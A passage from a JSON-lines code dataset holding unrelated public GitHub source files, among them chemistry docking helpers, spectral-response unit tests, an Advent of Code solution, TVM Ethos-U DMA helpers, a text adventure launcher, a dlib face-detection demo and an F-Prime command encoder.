Returns:\n :returns: list rs_chosen_smiles: A list of all the SMILES string which are\n to be added to make the child ligand. Each SMILES is a sublist.\n ie)[['[10006*][1009N]=[1008N+]=[1007N-]'],['[10006*][2009OH]']]\n \"\"\"\n\n rs_chosen_smiles = []\n for R in rs_chosen:\n Rs_for_the_R = []\n lig_number = R[0]\n if lig_number == str(1):\n Rs_for_the_R.append(r_smiles_dict_1[R])\n elif lig_number == str(2):\n Rs_for_the_R.append(r_smiles_dict_2[R])\n\n rs_chosen_smiles.append(Rs_for_the_R)\n\n return rs_chosen_smiles\n\n\ndef get_rs_chosen_from_bs(bs_chosen, b_to_r_master_dict_1, b_to_r_master_dict_2):\n \"\"\"\n this function returns a list of R-groups chosen based on the list of\n chosen B's. It requires the b_to_r_master_dict_1 for both ligands to\n function.\n\n Inputs:\n :param list bs_chosen: A list of the chosen B-groups. ie) ['1B1', 1B2',\n '2B3']\n :param dict b_to_r_master_dict_1: a Dictionary to reference B and R-groups\n from mol_1. keys are names of B-groups; items are R-groups that a B-group\n represents. ie) {'1B1':['1R1'],'1B2':['1R2','1R3','1R4'],'1B3': ['1R5']}\n :param dict b_to_r_master_dict_2: a Dictionary to reference B and R-groups\n from mol_2. keys are names of B-groups; items are R-groups that a B-group\n represents. ie) {'2B1':['2R1'],'2B2':['2R2','2R3','2R4'],'2B3':\n ['2R5','2R6]}\n\n Returns:\n :returns: list rs_chosen: a list containing all the R-groups represented\n by the chosen B-groups. ie) ['1R1', '1R2', '1R3','1R4', '2R5', '2R6']\n \"\"\"\n\n rs_chosen = []\n for B in bs_chosen:\n Rs_for_the_B = []\n lig_number = B[0]\n if lig_number == str(1):\n for i in b_to_r_master_dict_1[B]:\n Rs_for_the_B.append(i)\n\n elif lig_number == str(2):\n for i in b_to_r_master_dict_2[B]:\n Rs_for_the_B.append(i)\n for i in Rs_for_the_B:\n rs_chosen.append(i)\n\n return rs_chosen","repo_name":"YuriiBatkovych/Genetic-algorithms-with-docking","sub_path":"Implementation/src/crossover/groups_dict_r/get_rs_chosen.py","file_name":"get_rs_chosen.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"27946619619","text":"from builtins import print\n\n\nclass Student:\n def __init__(self):\n self.name = 'deep'\n self.sem = 8\n self.stream = 'IT'\n\n def update(self):\n self.stream = 'CE'\n\n def compare(self, s2):\n print(\"Compare stream : \",\"Same Stream\" if self.stream == s2.stream else \"Different Stream\")\n\n\ns1 = Student() # <- this is a constructor and it will assign a meomry to object\ns2 = Student()\n# whenever we are creating a new object it will take different memory\n'''print(\"Id of s1 : \",id(s1))\nprint(\"Id of s2 : \",id(s2))'''\ns1.name = 'dhaval'\ns1.compare(s2) # self = s1\ns1.update() # it is passing s1 as params as self\nprint(\"name for s1 : \", s1.name, \"\\nsem for s1 : \", s1.sem, \"\\nstream for s1 : \", s1.stream)\nprint(\"name for s2 : \", s2.name, \"\\nsem for s2 : \", s2.sem, \"\\nstream for s2 : \", s2.stream)\ns2.compare(s1) # self = s2\n\n","repo_name":"deepdalsania/tutorials","sub_path":"core-python/Core_Python/oop/ConstructorAndSelf.py","file_name":"ConstructorAndSelf.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"95"} +{"seq_id":"7465809745","text":"import numpy as np\nimport jax.numpy as jnp\nfrom jax import jit\nfrom exojax.utils.grids import wavenumber_grid\nfrom exojax.spec.response import ipgauss_sampling\nfrom exojax.spec.response import ipgauss_variable_sampling\nfrom exojax.utils.grids import velocity_grid\n\nfrom exojax.utils.constants import c\n\ndef _ipgauss_sampling_naive(nusd, nus, F0, beta, RV):\n \"\"\"Apply the Gaussian IP response + sampling to a spectrum F.\n\n Args:\n nusd: sampling wavenumber\n nus: input wavenumber, evenly log-spaced\n F0: original spectrum (F0)\n beta: STD of a Gaussian broadening (IP+microturbulence)\n RV: radial velocity (km/s)\n\n Return:\n response-applied spectrum (F)\n \"\"\"\n # The following check should be placed as another function.\n # if(np.min(nusd) < np.min(nus) or np.max(nusd) > np.max(nus)):\n # print('WARNING: The wavenumber range of the observational grid [', np.min(nusd), '-', np.max(nusd), ' cm^(-1)] is not fully covered by that of the model grid [', np.min(nus), '-', np.max(nus), ' cm^(-1)]. This can result in the incorrect response-applied spectrum. Check the wavenumber grids for the model and observation.', sep='')\n\n @jit\n def ipgauss_sampling_jax(nusd, nus, F0, beta, RV):\n dvmat = jnp.array(c * jnp.log(nusd[None, :] / nus[:, None]))\n kernel = jnp.exp(-(dvmat + RV)**2 / (2.0 * beta**2))\n kernel = kernel / jnp.sum(kernel, axis=0) # axis=N\n F = kernel.T @ F0\n return F\n\n F = ipgauss_sampling_jax(nusd, nus, F0, beta, RV)\n return F\n\ndef test_ipgauss_sampling(fig=False):\n nus, wav, resolution = wavenumber_grid(4000.0,\n 4010.0,\n 1000,\n xsmode=\"premodit\")\n F0 = np.ones_like(nus)\n F0[500 - 5:500 + 5] = 0.5\n RV = 10.0\n beta = 20.0\n nusd, wav, resolution_inst = wavenumber_grid(4003.0,\n 4007.0,\n 250,\n xsmode=\"lpf\")\n #settings before HMC\n vsini_max = 100.0\n vr_array = velocity_grid(resolution, vsini_max)\n\n F = ipgauss_sampling(nusd, nus, F0, beta, RV, vr_array)\n\n F_naive = _ipgauss_sampling_naive(nusd, nus, F0, beta, RV)\n res = np.max(np.abs(1.0 - F_naive/F))\n print(res)\n assert res < 1.e-4 #0.1% allowed\n if fig:\n import matplotlib.pyplot as plt\n plt.plot(nusd,F)\n plt.plot(nusd,F_naive,ls=\"dashed\")\n plt.show()\n\ndef test_SopInstProfile():\n from exojax.spec.specop import SopInstProfile\n \n nus, wav, resolution = wavenumber_grid(4000.0,\n 4010.0,\n 1000,\n xsmode=\"premodit\")\n F0 = np.ones_like(nus)\n F0[500 - 5:500 + 5] = 0.5\n RV = 10.0\n beta = 20.0\n nusd, wav, resolution_inst = wavenumber_grid(4003.0,\n 4007.0,\n 250,\n xsmode=\"lpf\")\n \n SopInst = SopInstProfile(nus, resolution)\n \n F = SopInst.ipgauss(F0, beta)\n F = SopInst.sampling(F, RV, nusd)\n F_naive = _ipgauss_sampling_naive(nusd, nus, F0, beta, RV)\n res = np.max(np.abs(1.0 - F_naive/F))\n print(res)\n assert res < 1.e-4 #0.1% allowed\n\n\ndef test_ipgauss_variable_sampling_using_constant_beta_array(fig=False):\n nus, wav, resolution = wavenumber_grid(4000.0,\n 4010.0,\n 1000,\n xsmode=\"premodit\")\n F0 = np.ones_like(nus)\n F0[500 - 5:500 + 5] = 0.5\n RV = 10.0\n beta = 20.0\n nusd, wav, resolution_inst = wavenumber_grid(4003.0,\n 4007.0,\n 250,\n xsmode=\"lpf\")\n #settings before HMC\n beta = 20.0\n beta_variable = np.ones_like(nusd)*beta\n\n F = ipgauss_variable_sampling(nusd, nus, F0, beta_variable, RV)\n\n F_naive = _ipgauss_sampling_naive(nusd, nus, F0, beta, RV)\n res = np.max(np.abs(1.0 - F_naive/F))\n print(res)\n assert res < 1.e-4 #0.1% allowed\n if fig:\n import matplotlib.pyplot as plt\n plt.plot(nusd,F)\n plt.plot(nusd,F_naive,ls=\"dashed\")\n plt.show()\n\n\nif __name__ == \"__main__\":\n #test_ipgauss_sampling(fig=True)\n #test_ipgauss_variable_sampling_using_constant_beta_array(fig=True)\n test_SopInstProfile()\n","repo_name":"HajimeKawahara/exojax","sub_path":"tests/unittests/spec/response/response_test.py","file_name":"response_test.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"95"} +{"seq_id":"928090232","text":"import util\r\nfrom functools import reduce\r\nimport json\r\nimport math\r\nfrom copy import deepcopy\r\n\r\n\r\nclass Snailfish:\r\n def __init__(self, left, right, parent=None):\r\n self.left = left\r\n self.right = right\r\n self.parent = parent\r\n self.final = isinstance(left, int) & isinstance(right, int)\r\n\r\n @classmethod\r\n def parse_from_list(cls, input_list):\r\n if isinstance(input_list, list):\r\n [left, right] = input_list\r\n return cls(Snailfish.parse_from_list(left), Snailfish.parse_from_list(right))\r\n else:\r\n return input_list\r\n\r\n def set_parents(self, parent=None):\r\n self.parent = parent\r\n if not isinstance(self.left, int):\r\n self.left.set_parents(self)\r\n if not isinstance(self.right, int):\r\n self.right.set_parents(self)\r\n\r\n def __explode_left(self, value, caller):\r\n if caller == self.left:\r\n if self.parent is None:\r\n return\r\n self.parent.__explode_left(value, self)\r\n elif caller == self.right:\r\n if isinstance(self.left, int):\r\n self.left += value\r\n else:\r\n self.left.__explode_left(value, self)\r\n elif caller == self.parent:\r\n if isinstance(self.right, int):\r\n self.right += value\r\n else:\r\n self.right.__explode_left(value, self)\r\n\r\n def __explode_right(self, value, caller):\r\n if caller == self.right:\r\n if self.parent is None:\r\n return\r\n self.parent.__explode_right(value, self)\r\n elif caller == self.left:\r\n if isinstance(self.right, int):\r\n self.right += value\r\n else:\r\n self.right.__explode_right(value, self)\r\n elif caller == self.parent:\r\n if isinstance(self.left, int):\r\n self.left += value\r\n else:\r\n self.left.__explode_right(value, self)\r\n\r\n def __exploded_this(self, caller):\r\n if caller == self.left:\r\n self.left = 0\r\n if isinstance(self.right, int):\r\n self.final = True\r\n elif caller == self.right:\r\n self.right = 0\r\n if isinstance(self.left, int):\r\n self.final = True\r\n else:\r\n print(\"Error\")\r\n\r\n def __reduce_explode(self, depth=0):\r\n if self.final:\r\n if depth >= 4:\r\n self.parent.__explode_right(self.right, self)\r\n self.parent.__explode_left(self.left, self)\r\n self.parent.__exploded_this(self)\r\n return True\r\n return False\r\n else:\r\n if (not isinstance(self.left, int)) and self.left.__reduce_explode(depth + 1):\r\n return True\r\n else:\r\n return (not isinstance(self.right, int)) and self.right.__reduce_explode(depth + 1)\r\n\r\n def __reduce_split(self):\r\n if isinstance(self.left, int):\r\n if self.left >= 10:\r\n self.left = Snailfish(math.floor(self.left/2), math.ceil(self.left/2), self)\r\n self.final = False\r\n return True\r\n else:\r\n if self.left.__reduce_split():\r\n return True\r\n if isinstance(self.right, int):\r\n if self.right >= 10:\r\n self.right = Snailfish(math.floor(self.right/2), math.ceil(self.right/2), self)\r\n self.final = False\r\n return True\r\n else:\r\n return self.right.__reduce_split()\r\n return False\r\n\r\n def reduce(self):\r\n while self.__reduce_explode() or self.__reduce_split():\r\n pass\r\n\r\n def __add__(self, other):\r\n result = Snailfish(self, other)\r\n self.parent = result\r\n other.parent = result\r\n result.reduce()\r\n return result\r\n\r\n def get_magnitude(self):\r\n if type(self.left) == type(self):\r\n left_m = self.left.get_magnitude()\r\n else:\r\n left_m = self.left\r\n if type(self.right) == type(self):\r\n right_m = self.right.get_magnitude()\r\n else:\r\n right_m = self.right\r\n return 3 * left_m + 2 * right_m\r\n\r\n\r\ndef task1():\r\n # Parse and format data\r\n data = util.load_data(\"input/day18.txt\")\r\n data = [Snailfish.parse_from_list(json.loads(line)) for line in data]\r\n for point in data:\r\n point.set_parents()\r\n\r\n # Actual task\r\n total = reduce(lambda a, b: a + b, data)\r\n print(total.get_magnitude())\r\n\r\n\r\ndef task2():\r\n # Parse and format data\r\n data = util.load_data(\"input/day18.txt\")\r\n data = [Snailfish.parse_from_list(json.loads(line)) for line in data]\r\n for point in data:\r\n point.set_parents()\r\n\r\n max_magnitude = 0\r\n for x in data:\r\n for y in data:\r\n if x != y:\r\n max_magnitude = max((deepcopy(x) + deepcopy(y)).get_magnitude(), max_magnitude)\r\n\r\n print(max_magnitude)\r\n","repo_name":"Simoris/AdventOfCode21","sub_path":"src/day18.py","file_name":"day18.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"20946779763","text":"from typing import Callable, Tuple, Optional, List\n\nimport tvm # type: ignore\nfrom tvm import te\nfrom tvm.topi.utils import equal_const_int # type: ignore\n\n\ndef _pad_tensor(\n tensor: te.Tensor, pad_before: List[int], pad_after: Optional[List[int]] = None\n) -> Callable:\n \"\"\"Generate a padded tensor.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to pad.\n pad_before : tuple of int\n The 'before' padding on each axis.\n pad_after : tuple of int\n The 'after' padding on each axis.\n Returns\n -------\n _pad : callable\n The padded tensor.\n\n \"\"\"\n pad_after = pad_after or pad_before\n dims = len(tensor.shape)\n assert len(pad_before) == dims\n assert len(pad_after) == dims\n\n def _pad(*indices):\n not_zero = [] # A list of padding conditions that aren't trivial (zero padding)\n index_tuple = [] # The indices with which to access the padded tensor\n for i in range(dims):\n if equal_const_int(pad_before[i], 0) and equal_const_int(pad_after[i], 0):\n index_tuple.append(indices[i])\n else:\n index_tuple.append(indices[i] - pad_before[i])\n not_zero.append(indices[i] >= pad_before[i])\n not_zero.append(indices[i] < tensor.shape[i] + pad_before[i])\n if not_zero:\n not_zero = tvm.tir.all(*not_zero)\n return tvm.tir.if_then_else(\n not_zero, tensor(*index_tuple), tvm.tir.const(0, tensor.dtype)\n )\n return tensor(*index_tuple)\n\n return _pad\n\n\ndef read_compute(\n tensor: te.Tensor, zero_point: int, scale: float, layout: Optional[str] = None\n) -> te.Tensor:\n \"\"\"A tensor expression which represents a read.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to read.\n zero_point : int\n The zero point of the tensor.\n scale : float\n The scale of the tensor.\n layout : Optional[str]\n The layout of the tensor, either NHWC or NHCWB16.\n\n Returns\n -------\n te.Tensor\n The tensor having been read.\n\n \"\"\"\n read_attrs = {\n \"op\": \"ethosu_read\",\n \"zero_point\": zero_point,\n \"scale\": scale,\n }\n\n if layout:\n assert layout in {\"NHWC\", \"NHCWB16\"}\n read_attrs[\"layout\"] = layout\n\n return te.compute(tensor.shape, lambda *i: tensor(*i), name=\"ethosu_read\", attrs=read_attrs)\n\n\ndef write_compute(\n tensor: te.Tensor,\n zero_point: int,\n scale: float,\n layout: Optional[str] = None,\n attrs: dict = None,\n) -> te.Tensor:\n \"\"\"A tensor expression which represents a write.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to write.\n zero_point : int\n The zero point of the tensor.\n scale : float\n The scale of the tensor.\n layout : Optional[str]\n The layout of the tensor, either NHWC or NHCWB16.\n attrs : dict, optional\n Additional attributes to add to the compute op.\n\n Returns\n -------\n te.Tensor\n The tensor having been written.\n\n \"\"\"\n\n if not attrs:\n attrs = {}\n\n write_attrs = {\n \"op\": \"ethosu_write\",\n \"zero_point\": zero_point,\n \"scale\": scale,\n }\n\n if layout:\n assert layout in {\"NHWC\", \"NHCWB16\"}\n write_attrs[\"layout\"] = layout\n\n write_attrs = {**write_attrs, **attrs}\n return te.compute(\n tensor.shape,\n lambda *i: tensor(*i),\n name=\"ethosu_write\",\n attrs=write_attrs,\n )\n\n\ndef convert_to_nhwc_compute(tensor: te.Tensor, layout: str, channels: int) -> te.Tensor:\n \"\"\"Converts a tensor into NHWC layout if it's in NHWCB16 layout.\n\n When the current layout is NHCWB16, a reduce sum operation is inserted\n to ensure that the whole of the input tensor has a data dependency on\n the copy operation. Without this, TVM removes compute that is deemed to\n be unnecessary, which causes strides for the NPU to be calculated\n incorrectly.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to convert.\n layout : str\n The layout of the tensor, either NHWC or NHCWB16.\n channels : int\n The number of valid channels for the tensor.\n\n Returns\n -------\n te.Tensor\n The converted tensor in NHWC layout.\n\n \"\"\"\n assert layout in {\"NHWC\", \"NHCWB16\"}\n convert_to_nhwc_attrs = {\n \"op\": \"ethosu_convert_to_nhwc\",\n \"layout\": layout,\n }\n if layout == \"NHCWB16\":\n rc = te.reduce_axis((0, 16), name=\"rc\")\n return te.compute(\n (tensor.shape[0], tensor.shape[1], tensor.shape[3], channels),\n lambda nn, hh, ww, cc: te.sum(\n tensor(nn, hh, te.indexdiv(cc, 16), ww, te.indexmod(rc, 16)), axis=rc\n ),\n name=\"ethosu_convert_to_nhwc\",\n attrs=convert_to_nhwc_attrs,\n )\n\n return te.compute(\n tensor.shape,\n lambda *i: tensor(*i),\n name=\"ethosu_convert_to_nhwc\",\n attrs=convert_to_nhwc_attrs,\n )\n\n\ndef convert_to_nhcwb16_compute(tensor: te.Tensor, layout: str, channels: int) -> te.Tensor:\n \"\"\"Converts a tensor into NHCWB16 layout if it's in NHWC layout.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to convert.\n layout : str\n The layout of the tensor, either NHWC or NHCWB16.\n channels : int\n The number of valid channels for the tensor.\n\n Returns\n -------\n te.Tensor\n The converted tensor in NHCWB16 layout.\n\n \"\"\"\n assert layout in {\"NHWC\", \"NHCWB16\"}\n convert_to_nhcwb16_attrs = {\n \"op\": \"ethosu_convert_to_nhcwb16\",\n \"layout\": layout,\n }\n if layout == \"NHCWB16\":\n out_channel_bricks = te.indexdiv(channels - 1, 16) + 1\n output_shape = (1, tensor.shape[1], out_channel_bricks, tensor.shape[2], 16)\n return te.compute(\n output_shape,\n lambda nn, hh, cc, ww, cb: tvm.tir.if_then_else(\n cc * 16 + cb < channels,\n tensor(nn, hh, ww, cc * 16 + cb),\n tvm.tir.IntImm(tensor.dtype, 0),\n ),\n name=\"ethosu_convert_to_nhcwb16\",\n attrs=convert_to_nhcwb16_attrs,\n )\n\n return te.compute(\n tensor.shape,\n lambda *i: tensor(*i),\n name=\"ethosu_convert_to_nhcwb16\",\n attrs=convert_to_nhcwb16_attrs,\n )\n\n\ndef pad_compute(tensor: te.Tensor, padding: tuple) -> te.Tensor:\n \"\"\"Pad an NHWC tensor in the height and width axes.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to pad.\n padding : tuple\n The 4 dimensional padding as (pad_top, pad_left, pad_bottom, pad_right).\n\n Returns\n -------\n te.Tensor\n The padded tensor.\n\n \"\"\"\n pad_top, pad_left, pad_down, pad_right = padding\n pad_before = [0, int(pad_top), int(pad_left), 0]\n pad_after = [0, int(pad_down), int(pad_right), 0]\n pad_attrs = {\n \"op\": \"ethosu_pad\",\n }\n shape = tensor.shape\n return te.compute(\n (shape[0], shape[1] + pad_top + pad_down, shape[2] + pad_left + pad_right, shape[3]),\n lambda nn, hh, ww, cc: _pad_tensor(tensor, pad_before, pad_after)(nn, hh, ww, cc),\n name=\"ethosu_pad\",\n attrs=pad_attrs,\n )\n\n\ndef upscale_compute(tensor: te.Tensor, upscale_factor: int) -> te.Tensor:\n \"\"\"Apply upscaling to an NHWC tensor.\n\n Parameters\n ----------\n tensor : te.Tensor\n The tensor to pad.\n upscale_factor : int\n The factor by which to apply upscaling.\n\n Returns\n -------\n te.Tensor\n The upscaled tensor.\n\n \"\"\"\n shape = tensor.shape\n\n reason = f\"The compiler only supports 2x2 upscaling, but factor was {upscale_factor}.\"\n assert upscale_factor in (1, 2), reason\n new_shape = (shape[0], shape[1] * upscale_factor, shape[2] * upscale_factor, shape[3])\n\n upscale_attrs = {\"op\": \"ethosu_upscale\"}\n\n return te.compute(\n new_shape,\n lambda nn, hh, ww, cc: tensor(nn, hh // upscale_factor, ww // upscale_factor, cc),\n name=\"ethosu_upscale\",\n attrs=upscale_attrs,\n )\n\n\ndef dma_ifm_compute(\n ifm: te.Tensor,\n layout: str,\n zero_point: int,\n scale: float,\n channels: int,\n padding: Tuple[int, int, int, int],\n upscale_factor: Optional[int] = 1,\n) -> te.Tensor:\n \"\"\"A sequence of compute operators representing the DMA capabilities for an IFM.\n\n Parameters\n ----------\n ifm : te.Tensor\n The Input Feature Map (IFM) tensor.\n layout : str\n The layout of the data, either NHWC or NHCWB16.\n zero_point : int\n The zero point of the data.\n scale : float\n The scale of the data.\n channels : int\n The number of valid channels for the data.\n padding : tuple\n The 4 dimensional padding as (pad_top, pad_left, pad_bottom, pad_right).\n upscale_factor : Optional[int]\n The factor by which to apply upscaling. By default there will be no upscaling.\n\n Returns\n -------\n te.Tensor\n The dma-ed IFM tensor.\n\n \"\"\"\n read_ifm = read_compute(ifm, zero_point, scale, layout=layout)\n convert_to_nhwc_ifm = convert_to_nhwc_compute(read_ifm, layout, channels)\n upscale_ifm = upscale_compute(convert_to_nhwc_ifm, upscale_factor)\n return pad_compute(upscale_ifm, padding)\n\n\ndef dma_ofm_compute(\n ofm: te.Tensor, layout: str, zero_point: int, scale: float, channels: int, attrs: dict = None\n) -> te.Tensor:\n \"\"\"A sequence of compute operators representing the DMA capabilities for an OFM.\n\n Parameters\n ----------\n ofm : te.Tensor\n The Output Feature Map (OFM) tensor.\n layout : str\n The layout of the data, either NHWC or NHCWB16.\n zero_point : int\n The zero point of the data.\n scale : float\n The scale of the data.\n channels : int\n The number of valid channels for the data.\n attrs : dict, optional\n Additional attributes to add to the write compute op.\n\n\n Returns\n -------\n te.Tensor\n The dma-ed OFM tensor.\n\n \"\"\"\n if not attrs:\n attrs = {}\n convert_to_nhcwb16_ofm = convert_to_nhcwb16_compute(ofm, layout, channels)\n return write_compute(convert_to_nhcwb16_ofm, zero_point, scale, layout=layout, attrs=attrs)\n","repo_name":"apache/tvm","sub_path":"python/tvm/relay/backend/contrib/ethosu/te/dma.py","file_name":"dma.py","file_ext":"py","file_size_in_byte":10267,"program_lang":"python","lang":"en","doc_type":"code","stars":10533,"dataset":"github-code","pt":"95"} +{"seq_id":"18611012416","text":"# coding: utf-8\n# author: David Labu\n\nimport wumpus_v2\nimport argparse\nimport time\nimport sys\n\n\ndef launch(n, h, a, c):\n '''\n :param n: casillas alto / ancho tablero [n = number]\n :param h: número de hoyos (recomendado n - 2) [h = holes]\n :param a: número de flechas disponible [a = arrow]\n :param c: trucos activados. permite visualziar el mapa\n '''\n try:\n # preparar partida\n print('¡Bienvenido a Hunt The Wumpus!\\n')\n if not n:\n print('Introduce el tamaño del tablero.')\n n = wumpus_v2.get_input_number()\n if not h:\n print('Introduce el número de pozos')\n h = wumpus_v2.get_input_number()\n if not a:\n print('Introduce el número de flechas')\n a = wumpus_v2.get_input_number()\n print('Creando Tablero...')\n partida = wumpus_v2.HuntTheWumpus(n, h, a)\n # empezar turnos\n print_delay('''\n *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*\n * __ __ *\n * \\ \\ / / *\n * \\ \\ /\\ / / _ _ __ ___ _ __ _ _ ___ *\n * \\ \\/ \\/ / | | | '_ ` _ \\| '_ \\| | | / __| *\n * \\ /\\ /| |_| | | | | | | |_) | |_| \\__ \\ *\n * \\/ \\/ \\__,_|_| |_| |_| .__/ \\__,_|___/ *\n * | | *\n * |_| *\n *=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=* \n ''')\n print('\\nEntras en la caverna del Wumpus y lo primero que ves es...')\n if c:\n partida.board.print_board()\n while not partida.config.endgame:\n partida.print_perception()\n print('¿qué decides?:\\n\\t1- Avanzar\\n\\t2- Girar\\n\\t3- Atacar\\n\\t4- Escapar')\n partida.action = wumpus_v2.get_input_number()\n while not 1 <= partida.action <= 4:\n print('¡No puedo hacer nada con eso!')\n print('Estas son tus opciones:\\n\\t1- Avanzar\\n\\t2- Girar\\n\\t3- Atacar\\n\\t4- Escapar')\n partida.action = wumpus_v2.get_input_number()\n partida.do_action()\n\n except Exception as e:\n print('[ERROR] Fin de partida! Con su fuerza de voluntad, Wumpus '\n 'ha usado el hechizo incontrarestable ' + str(e))\n raise e\n\n\ndef print_delay(cool_string):\n for char in cool_string:\n time.sleep(0.02)\n print_by_sys(char)\n\n\ndef print_by_sys(string):\n sys.stdout.write(string)\n sys.stdout.flush()\n\n\nif __name__ == '__main__':\n ap = argparse.ArgumentParser()\n ap.add_argument('-n', '--number', help='casillas alto / ancho tablero', type=int, default=None)\n ap.add_argument('-w', '--well', help='número de hoyos', type=int, default=None)\n ap.add_argument('-a', '--arrow', help='número de flechas disponible', type=int, default=None)\n ap.add_argument('-c', '--cheats', help='black sheep wall muestra el mapa', type=int, default=None)\n args = vars(ap.parse_args())\n launch(args['number'], args['well'], args['arrow'], args['cheats'])\n # launch(None, None, None)\n","repo_name":"Labuiga/wumpy","sub_path":"launch.py","file_name":"launch.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"36228989741","text":"import cv2\nimport urllib \nimport sys\nimport numpy as np\nimport dlib\nfrom skimage import io\n\n\nstream=urllib.urlopen('http://oviso.axiscam.net/axis-cgi/mjpg/video.cgi')\n#cascPath = sys.argv[1]\n#faceCascade = cv2.CascadeClassifier(cascPath)\n\ndetector = dlib.get_frontal_face_detector()\nwin = dlib.image_window()\n\nbytes=''\nwhile True:\n bytes+=stream.read(1024)\n a = bytes.find('\\xff\\xd8')\n b = bytes.find('\\xff\\xd9')\n if a!=-1 and b!=-1:\n jpg = bytes[a:b+2]\n bytes= bytes[b+2:]\n i = cv2.imdecode(np.fromstring(jpg, dtype=np.uint8),cv2.IMREAD_COLOR)\n gray = cv2.cvtColor(i, cv2.COLOR_BGR2RGB)\n \n dets = detector(i, 1)\n\n print(\"Number of faces detected: {}\".format(len(dets)))\n for i, d in enumerate(dets):\n print(\"Detection {}: Left: {} Top: {} Right: {} Bottom: {}\".format(\n i, d.left(), d.top(), d.right(), d.bottom()))\n\n win.clear_overlay()\n win.set_image(gray)\n win.add_overlay(dets)\n","repo_name":"serman/watermachinecontrol","sub_path":"test_examples/dlib-mjpeg-example.py","file_name":"dlib-mjpeg-example.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"34076131632","text":"\"\"\"\n@brief Encoder for cmd data\n\nThis encoder takes in cmd_data objects, serializes them, and sends the results\nto all registered senders.\n\nSerialized command format:\n +--------------------------------+ -\n | Header = \"A5A5 \" | |\n | (5 byte string) | |\n +--------------------------------+ Added by\n | Destination = \"GUI \" or \"FSW \" | Sender\n | (4 byte string) | |\n +--------------------------------+ -\n | Command descriptor |\n | (0x5A5A5A5A) |\n | (4 byte number) |\n +--------------------------------+\n | Length of descriptor, opcode, |\n | and argument data |\n | (4 bytes) |\n +--------------------------------+\n | Descriptor type = 0 |\n | (4 bytes) |\n +--------------------------------+\n | Op code |\n | (4 bytes) |\n +--------------------------------+\n | Argument 1 value |\n +--------------------------------+\n | Argument 2 value |\n +--------------------------------+\n | ... |\n +--------------------------------+\n | Argument n value |\n +--------------------------------+\n\n@date Created July 9, 2018\n@author R. Joseph Paetz\n\n@bug No known bugs\n\"\"\"\n\n\nfrom fprime.common.models.serialize.numerical_types import U32Type\n\nfrom fprime_gds.common.data_types.cmd_data import CmdData\nfrom fprime_gds.common.utils import config_manager\nfrom fprime_gds.common.utils.data_desc_type import DataDescType\n\nfrom . import encoder\n\n\nclass CmdEncoder(encoder.Encoder):\n \"\"\"Encoder class for command data\"\"\"\n\n def __init__(self, config=None):\n \"\"\"\n CmdEncoder class constructor\n\n Args:\n config (ConfigManager, default=None): Object with configuration data\n for the sizes of fields in the binary data. If None passed,\n defaults are used.\n\n Returns:\n An initialized CmdEncoder object\n \"\"\"\n\n if config is None:\n config = config_manager.ConfigManager().get_instance()\n super().__init__(config)\n\n self.len_obj = self.config.get_type(\"msg_len\")\n self.desc_obj = self.config.get_type(\"msg_desc\")\n self.opcode_obj = self.config.get_type(\"op_code\")\n\n def encode_api(self, data):\n \"\"\"\n Encodes the given CmdData object as binary data and returns the result.\n\n Args:\n data: CmdData object to encode\n\n Returns:\n Encoded version of the data argument as binary data\n \"\"\"\n assert isinstance(data, CmdData), \"Encoder handling incorrect type\"\n cmd_temp = data.get_template()\n\n desc = U32Type(0x5A5A5A5A).serialize()\n\n self.desc_obj.val = DataDescType[\"FW_PACKET_COMMAND\"].value\n descriptor = self.desc_obj.serialize()\n\n self.opcode_obj.val = cmd_temp.get_op_code()\n op_code = self.opcode_obj.serialize()\n\n arg_data = b\"\"\n for arg in data.get_args():\n arg_data += arg.serialize()\n\n length_val = len(descriptor) + len(op_code) + len(arg_data)\n self.len_obj.val = length_val\n length = self.len_obj.serialize()\n\n binary_data = desc + length + descriptor + op_code + arg_data\n\n return binary_data\n","repo_name":"fprime-community/fprime-gds","sub_path":"src/fprime_gds/common/encoders/cmd_encoder.py","file_name":"cmd_encoder.py","file_ext":"py","file_size_in_byte":3480,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"95"} +{"seq_id":"73151519993","text":"import os\nimport wx.lib.newevent\nimport glob\nimport time \nimport thread\nfrom sys import platform as _platform\nif _platform == \"linux\" or _platform == \"linux2\":\n\timport termios #@UnresolvedImport\n\nfrom settings import BUTTONDIM, BUTTONDIMLG, RECEIVED_MSG\nfrom pendant import Pendant\nfrom webcamclient import Webcam\nfrom XMLDoc import XMLDoc\n\nbaudChoices = [\"2400\", \"9600\", \"19200\", \"38400\", \"57600\", \"115200\", \"250000\"]\n\nfrom reprap import RepRap, RepRapParser\n\n(PendantEvent, EVT_PENDANT) = wx.lib.newevent.NewEvent()\nPENDANT_CONNECT = 0\nPENDANT_DISCONNECT = 1\nPENDANT_COMMAND = 3\n\nTRACE = False\n\nVISIBLELISTSIZE = 5\n\nTLTICKRATE = 10\nMAXDIRCHARS = 50\nMAXSTATCHARS = 50\n\n\nclass Connection:\n\tdef __init__(self, app, printer, port, baud):\n\t\tself.app = app\n\t\tself.logger = self.app.logger\n\t\tself.printer = printer\n\t\tself.port = port\n\t\tself.parser = RepRapParser(self.app)\n\t\tself.reprap = RepRap(self.app, printer)\n\t\tself.connected = self.reprap.connect(port, baud)\n\t\tself.prtmon = None\n\t\tself.manctl = None\n\t\tself.pendantConnected = 